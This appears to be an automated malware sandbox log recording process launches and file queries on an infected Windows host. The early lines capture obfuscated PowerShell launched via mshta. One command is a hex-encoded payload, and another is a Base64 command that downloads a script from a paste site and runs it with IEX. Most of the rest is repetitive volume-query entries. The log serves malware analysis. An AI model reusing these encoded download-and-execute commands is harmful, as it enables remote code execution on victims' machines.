      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -ExecutionPolicy UnRestricted -Enc bABzACAAcABhAG4AeQBvACoAOwBTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAEUAbQBpACAAJwBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAGcATQBXAEkAcABFAEgATgBWAGkAewBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABEAHYAZwB5AGkASgB4AHUAVAB0ACgAcwB0AHIAaQBuAGcAIAB1AHIAbAApAHsAcgBlAHQAdQByAG4AIAAoAG4AZQB3ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACgAKQApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAdQByAGwAKQA7AH0AfQAnADsAUwBlAHQALQBWAGEAcgBpAGEAYgBsAGUAIABCAEYAIAAnAGgAdAB0AHAAcwA6AC8ALwBuAG8AcABhAHMAdABlAC4AbgBlAHQALwBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAJwA7ACYAKABHAFYAIABFACoAdABlAHgAKgApAC4AVgBhAGwAdQBlAC4AKAAoACgARwBWACAARQAqAHQAZQB4ACoAKQAuAFYAYQBsAHUAZQB8AEcATQApAFsANgBdAC4ATgBhAG0AZQApAC4AKAAoACgARwBWACAARQAqAHQAZQB4ACoAKQAuAFYAYQBsAHUAZQAuACgAKAAoAEcAVgAgAEUAKgB0AGUAeAAqACkALgBWAGEAbAB1AGUAfABHAE0AKQBbADYAXQAuAE4AYQBtAGUAKQAuAFAAcwBPAGIAagBlAGMAdAAuAE0AZQB0AGgAbwBkAHMAfABXAGgAZQByAGUALQBPAGIAagBlAGMAdAB7ACQAXwAuAE4AYQBtAGUALQBjAGwAaQBrAGUAJwBHACoAZAAnAH0AKQAuAE4AYQBtAGUAKQAuAEkAbgB2AG8AawBlACgAKABHAFYAIABFACoAdABlAHgAKgApAC4AVgBhAGwAdQBlAC4AKAAoACgARwBWACAARQAqAHQAZQB4ACoAKQAuAFYAYQBsAHUAZQB8AEcATQApAFsANgBdAC4ATgBhAG0AZQApAC4AKAAoACgARwBWACAARQAqAHQAZQB4ACoAKQAuAFYAYQBsAHUAZQAuACgAKAAoAEcAVgAgAEUAKgB0AGUAeAAqACkALgBWAGEAbAB1AGUAfABHAE0AKQBbADYAXQAuAE4AYQBtAGUAKQB8AEcATQB8AFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0AHsAJABfAC4ATgBhAG0AZQAtAGMAbABpAGsAZQAnACoAbwBtACoAZQAnAH0AKQAuAE4AYQBtAGUAKQAuAEkAbgB2AG8AawBlACgAJwAqAC0AVAB5ACoAZQAnACwAMQAsADEAKQAsAFsATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBDAG8AbQBtAGEAbgBkAFQAeQBwAGUAcwBdADoAOgBDAG0AZABsAGUAdAApAC0ATABhACAAQwBTAGgAYQByAHAAIAAoAEwAUwAgAFYAYQByAGkAYQBiAGwAZQA6AC8ARQBtAGkAKQAuAFYAYQBsAHUAZQA7ACgAWwBnAE0AVwBJAHAARQBIAE4AVgBpAF0AOgA6AEQAdgBnAHkAaQBKAHgAdQBUAHQAKAAoAEcAVgAgAEIARgAgAC0AVgBhAGwAdQBlAE8AbgBsACkAKQApAHwAJgAoAEcASQAgAEEAbABpAGEAcwA6AEkARQAqACkA
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qwzwa2hv.cmdline"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\cb93f779-25b4-41a2-a992-79114e2e0d22\xdd.exe "C:\Users\user\AppData\Local\Temp\cb93f779-25b4-41a2-a992-79114e2e0d22\xdd.exe"
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBF57.tmp" "c:\Users\user\AppData\Local\Temp\CSC2CD5A3AC9BED45FD9C1F4AD4196788AE.TMP"
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function wxndl($cixw){return -split ($cixw -replace '..', '0x$& ')};$ggxu = wxndl('7a5b64ccd96d57d64efe4a812d2bc4bde9ae1b1e7f65468f80ea3d5b60b7d7c15f2443a3e6237eab1f9f3e91a5d835eb18a448ce892fc625ba5cb4e7734fa0b152e164a9ae08d0fef9b18c700ba2c123c96722c862d347993d0aa1af4aeebdd9b33579fd0c0e3e8f4ed828b8ebe67830131a567bc4410ed3de3db182881ab06e5d1206e78f5ab5bc320ceb0cd1230e202d819c71580b2958cc5c0e8d1b8bd3370ed4f7231f1f5798bcd1f65460270b2e1e6ed59863c8b5f03f81a685bad5e7b10e0fb9d1e708a9e5c024fa30ddc882fc492e0df958455665b085a89c33e2271c0460170b1a544fccc02aad22554d5904fedb87e26616adc6815b78e3f211ece66ee7d5818c58fd2367560d21420d5a870a96bf6813f16918fd2cae995e81e5d5eee764267adb4e5f453dac47d2aa762258e397c75cff7333f5692fc5e25513bac939ec2d35d580e47b773762afa92b8c33b29e596dd3c52fb4b99790bc72803ad41f0a8088b6cbed15134d7a3795f91350d8363992e47bc33998786b02f2bc54deada79da25cdd4e8456cde732ff3d1bd51ffb619bbf4745e1d5b394630de4c65145a4f40d54fc2fdfff60dac2370a34be793b19a62e7bfb4c17185c1dc5324f37ffb32f313cb1bd87d5ed80fde6998a2fa6eae031759049b99236c74ebe0fcaa0366dfbd6d5203bb793793c30dd6c7711f139487a16f956ded2456e89da6e8075e848518861f83e12fe6b6d9418fc30b86423f75566f6b84368c093b9c427a827cca5508786a5c0c9c4fdc8098cf6f6387ef1b6779e7520ffa6cb54f1831f4aa87e12f048c0cf6f7626832eeaca8f18970723839bc8df8e4a95b0792580cb979cfc7127742bfac8575a87620516be0330ceeec026ae6def88079288ada091993d6a1e4095b56e7a4972d51cc3305b770ffd659d6df1a16842fab38ab77c79c33863a3ddd3492894f183be23a2f13e9b123c61aaa62ea17f6e370d5f5455bdcbe40447c979e2071a5e1c73dab66505d5097b0ce259e3740a4d336c5d9d478b4bdd16372bc7edfe1881dea74e5b9ce7264f939fc71c1a404155682c546391908e072fabb77afa55ef85cf8d463af296cb5a97f75a04c27bb522cbd6647d3486ce6f1255a20c9f533cbb8e63861054920a4cac251bce2877d09d44209df14f219efb4c83461ed25dd05a3920be2b123c394cc75c22c37a1cbe663656dbbc5e092e0b0019d2990501f5747eebcb04b628410e9a300aef287cff0e6891f2f376c686f5fa861c85f88d563ce6da2baf185cc7c432fbc4291b50d6c71ec3af86f793050e7da9386849a66d23f884a8ebb084b1e52afd97fc48ed50a9e6127344548b3e1d3fe46a9b700e23523933f2658a2e11359a7801dcfa20518a8c8ecfb897185694e264d854ce8307694f52b05b1f77a162cf1dd6266acf5a7558c4494ff2e5b813ea6aa2f10a626fa53624caefb65b0bebccbce907fc29aff64d665f48576317019cb117e486db9344cb12b5a4c8c99244f69a2c044f0c2b1e2c015323e6f2e9963937f86a2f610b470a787592b51b4a8a0ac1bebcfba6bdbbae601be25e9697ed1f1f6620b93f5e571c3e1a4f0e8c47093bf22da12e6490b3ac878564d340b19f5614b1b063bd182e6d649d69afd32fb57dda451bb8764142fb0f42be6e0189467bc1cb105d5fb522273e3782fdaa9e79d531a3bb879ea59043a20fed1eb60716386b9aab98dc3ee64a1e470da50dac0026141747d5c0eed0044ec0d0915c02328f86f0bb7d373fb02861150ab1351e5702e10845e364532df7da550e8fadd43bc553c286b9362c8d94a1b01cbeed6a0696a644b4b1c4c07d01be9ffffe5e695fe16eebaf8905bd570be4b36d0f1c07d860553fbe42a1f44febf0a667e85d3544fe91ff701be78de167bb6758bb19538d1418d9b1403cfbd5c98dc579bab71c1ba2bfb6a2ed52bc640e
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -executionpolicy unrestricted -enc babzacaacabhag4aeqbvacoaowbtaguadaatafyayqbyagkayqbiagwazqagaeuabqbpacaajwbwahuaygbsagkaywagagmababhahmacwagagcatqbxaekacabfaegatgbwagkaewbwahuaygbsagkaywagahmadabhahqaaqbjacaacwb0ahiaaqbuagcaiabeahyazwb5agkasgb4ahuavab0acgacwb0ahiaaqbuagcaiab1ahiabaapahsacgblahqadqbyag4aiaaoag4azqb3acaauwb5ahmadablag0algboaguadaauafcazqbiaemababpaguabgb0acgakqapac4arabvahcabgbsag8ayqbkafmadabyagkabgbnacgadqbyagwakqa7ah0afqanadsauwblahqalqbwageacgbpageaygbsaguaiabcaeyaiaanaggadab0ahaacwa6ac8alwbuag8acabhahmadablac4abgblahqalwbmagyazgbmagyazgbmagyazgbmagyazgbmagyazgbmagyajwa7acyakabhafyaiabfacoadablahgakgapac4avgbhagwadqblac4akaaoacgarwbwacaarqaqahqazqb4acoakqauafyayqbsahuazqb8aecatqapafsangbdac4atgbhag0azqapac4akaaoacgarwbwacaarqaqahqazqb4acoakqauafyayqbsahuazqauacgakaaoaecavgagaeuakgb0aguaeaaqackalgbwageabab1aguafabhae0akqbbadyaxqauae4ayqbtaguakqauafaacwbpagiaagblagmadaauae0azqb0aggabwbkahmafabxaggazqbyagualqbpagiaagblagmadab7acqaxwauae4ayqbtagualqbjagwaaqbraguajwbhacoazaanah0akqauae4ayqbtaguakqauaekabgb2ag8aawblacgakabhafyaiabfacoadablahgakgapac4avgbhagwadqblac4akaaoacgarwbwacaarqaqahqazqb4acoakqauafyayqbsahuazqb8aecatqapafsangbdac4atgbhag0azqapac4akaaoacgarwbwacaarqaqahqazqb4acoakqauafyayqbsahuazqauacgakaaoaecavgagaeuakgb0aguaeaaqackalgbwageabab1aguafabhae0akqbbadyaxqauae4ayqbtaguakqb8aecatqb8afcaaablahiazqatae8aygbqaguaywb0ahsajabfac4atgbhag0azqatagmababpagsazqanacoabwbtacoazqanah0akqauae4ayqbtaguakqauaekabgb2ag8aawblacgajwaqac0avab5acoazqanacwamqasadeakqasafsatqbhag4ayqbnaguabqblag4adaauaeeadqb0ag8abqbhahqaaqbvag4algbdag8abqbtageabgbkafqaeqbwaguacwbdadoaogbdag0azabsaguadaapac0atabhacaaqwbtaggayqbyahaaiaaoaewauwagafyayqbyagkayqbiagwazqa6ac8arqbtagkakqauafyayqbsahuazqa7acgawwbnae0avwbjahaarqbiae4avgbpaf0aoga6aeqadgbnahkaaqbkahgadqbuahqakaaoaecavgagaeiargagac0avgbhagwadqblae8abgbsackakqapahwajgaoaecasqagaeeababpageacwa6aekarqaqacka
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function wxndl($cixw){return -split ($cixw -replace '..', '0x$& ')};$ggxu = wxndl('7a5b64ccd96d57d64efe4a812d2bc4bde9ae1b1e7f65468f80ea3d5b60b7d7c15f2443a3e6237eab1f9f3e91a5d835eb18a448ce892fc625ba5cb4e7734fa0b152e164a9ae08d0fef9b18c700ba2c123c96722c862d347993d0aa1af4aeebdd9b33579fd0c0e3e8f4ed828b8ebe67830131a567bc4410ed3de3db182881ab06e5d1206e78f5ab5bc320ceb0cd1230e202d819c71580b2958cc5c0e8d1b8bd3370ed4f7231f1f5798bcd1f65460270b2e1e6ed59863c8b5f03f81a685bad5e7b10e0fb9d1e708a9e5c024fa30ddc882fc492e0df958455665b085a89c33e2271c0460170b1a544fccc02aad22554d5904fedb87e26616adc6815b78e3f211ece66ee7d5818c58fd2367560d21420d5a870a96bf6813f16918fd2cae995e81e5d5eee764267adb4e5f453dac47d2aa762258e397c75cff7333f5692fc5e25513bac939ec2d35d580e47b773762afa92b8c33b29e596dd3c52fb4b99790bc72803ad41f0a8088b6cbed15134d7a3795f91350d8363992e47bc33998786b02f2bc54deada79da25cdd4e8456cde732ff3d1bd51ffb619bbf4745e1d5b394630de4c65145a4f40d54fc2fdfff60dac2370a34be793b19a62e7bfb4c17185c1dc5324f37ffb32f313cb1bd87d5ed80fde6998a2fa6eae031759049b99236c74ebe0fcaa0366dfbd6d5203bb793793c30dd6c7711f139487a16f956ded2456e89da6e8075e848518861f83e12fe6b6d9418fc30b86423f75566f6b84368c093b9c427a827cca5508786a5c0c9c4fdc8098cf6f6387ef1b6779e7520ffa6cb54f1831f4aa87e12f048c0cf6f7626832eeaca8f18970723839bc8df8e4a95b0792580cb979cfc7127742bfac8575a87620516be0330ceeec026ae6def88079288ada091993d6a1e4095b56e7a4972d51cc3305b770ffd659d6df1a16842fab38ab77c79c33863a3ddd3492894f183be23a2f13e9b123c61aaa62ea17f6e370d5f5455bdcbe40447c979e2071a5e1c73dab66505d5097b0ce259e3740a4d336c5d9d478b4bdd16372bc7edfe1881dea74e5b9ce7264f939fc71c1a404155682c546391908e072fabb77afa55ef85cf8d463af296cb5a97f75a04c27bb522cbd6647d3486ce6f1255a20c9f533cbb8e63861054920a4cac251bce2877d09d44209df14f219efb4c83461ed25dd05a3920be2b123c394cc75c22c37a1cbe663656dbbc5e092e0b0019d2990501f5747eebcb04b628410e9a300aef287cff0e6891f2f376c686f5fa861c85f88d563ce6da2baf185cc7c432fbc4291b50d6c71ec3af86f793050e7da9386849a66d23f884a8ebb084b1e52afd97fc48ed50a9e6127344548b3e1d3fe46a9b700e23523933f2658a2e11359a7801dcfa20518a8c8ecfb897185694e264d854ce8307694f52b05b1f77a162cf1dd6266acf5a7558c4494ff2e5b813ea6aa2f10a626fa53624caefb65b0bebccbce907fc29aff64d665f48576317019cb117e486db9344cb12b5a4c8c99244f69a2c044f0c2b1e2c015323e6f2e9963937f86a2f610b470a787592b51b4a8a0ac1bebcfba6bdbbae601be25e9697ed1f1f6620b93f5e571c3e1a4f0e8c47093bf22da12e6490b3ac878564d340b19f5614b1b063bd182e6d649d69afd32fb57dda451bb8764142fb0f42be6e0189467bc1cb105d5fb522273e3782fdaa9e79d531a3bb879ea59043a20fed1eb60716386b9aab98dc3ee64a1e470da50dac0026141747d5c0eed0044ec0d0915c02328f86f0bb7d373fb02861150ab1351e5702e10845e364532df7da550e8fadd43bc553c286b9362c8d94a1b01cbeed6a0696a644b4b1c4c07d01be9ffffe5e695fe16eebaf8905bd570be4b36d0f1c07d860553fbe42a1f44febf0a667e85d3544fe91ff701be78de167bb6758bb19538d1418d9b1403cfbd5c98dc579bab71c1ba2bfb6a2ed52bc640e
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -executionpolicy unrestricted -enc babzacaacabhag4aeqbvacoaowbtaguadaatafyayqbyagkayqbiagwazqagaeuabqbpacaajwbwahuaygbsagkaywagagmababhahmacwagagcatqbxaekacabfaegatgbwagkaewbwahuaygbsagkaywagahmadabhahqaaqbjacaacwb0ahiaaqbuagcaiabeahyazwb5agkasgb4ahuavab0acgacwb0ahiaaqbuagcaiab1ahiabaapahsacgblahqadqbyag4aiaaoag4azqb3acaauwb5ahmadablag0algboaguadaauafcazqbiaemababpaguabgb0acgakqapac4arabvahcabgbsag8ayqbkafmadabyagkabgbnacgadqbyagwakqa7ah0afqanadsauwblahqalqbwageacgbpageaygbsaguaiabcaeyaiaanaggadab0ahaacwa6ac8alwbuag8acabhahmadablac4abgblahqalwbmagyazgbmagyazgbmagyazgbmagyazgbmagyazgbmagyajwa7acyakabhafyaiabfacoadablahgakgapac4avgbhagwadqblac4akaaoacgarwbwacaarqaqahqazqb4acoakqauafyayqbsahuazqb8aecatqapafsangbdac4atgbhag0azqapac4akaaoacgarwbwacaarqaqahqazqb4acoakqauafyayqbsahuazqauacgakaaoaecavgagaeuakgb0aguaeaaqackalgbwageabab1aguafabhae0akqbbadyaxqauae4ayqbtaguakqauafaacwbpagiaagblagmadaauae0azqb0aggabwbkahmafabxaggazqbyagualqbpagiaagblagmadab7acqaxwauae4ayqbtagualqbjagwaaqbraguajwbhacoazaanah0akqauae4ayqbtaguakqauaekabgb2ag8aawblacgakabhafyaiabfacoadablahgakgapac4avgbhagwadqblac4akaaoacgarwbwacaarqaqahqazqb4acoakqauafyayqbsahuazqb8aecatqapafsangbdac4atgbhag0azqapac4akaaoacgarwbwacaarqaqahqazqb4acoakqauafyayqbsahuazqauacgakaaoaecavgagaeuakgb0aguaeaaqackalgbwageabab1aguafabhae0akqbbadyaxqauae4ayqbtaguakqb8aecatqb8afcaaablahiazqatae8aygbqaguaywb0ahsajabfac4atgbhag0azqatagmababpagsazqanacoabwbtacoazqanah0akqauae4ayqbtaguakqauaekabgb2ag8aawblacgajwaqac0avab5acoazqanacwamqasadeakqasafsatqbhag4ayqbnaguabqblag4adaauaeeadqb0ag8abqbhahqaaqbvag4algbdag8abqbtageabgbkafqaeqbwaguacwbdadoaogbdag0azabsaguadaapac0atabhacaaqwbtaggayqbyahaaiaaoaewauwagafyayqbyagkayqbiagwazqa6ac8arqbtagkakqauafyayqbsahuazqa7acgawwbnae0avwbjahaarqbiae4avgbpaf0aoga6aeqadgbnahkaaqbkahgadqbuahqakaaoaecavgagaeiargagac0avgbhagwadqblae8abgbsackakqapahwajgaoaecasqagaeeababpageacwa6aekarqaqacka
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
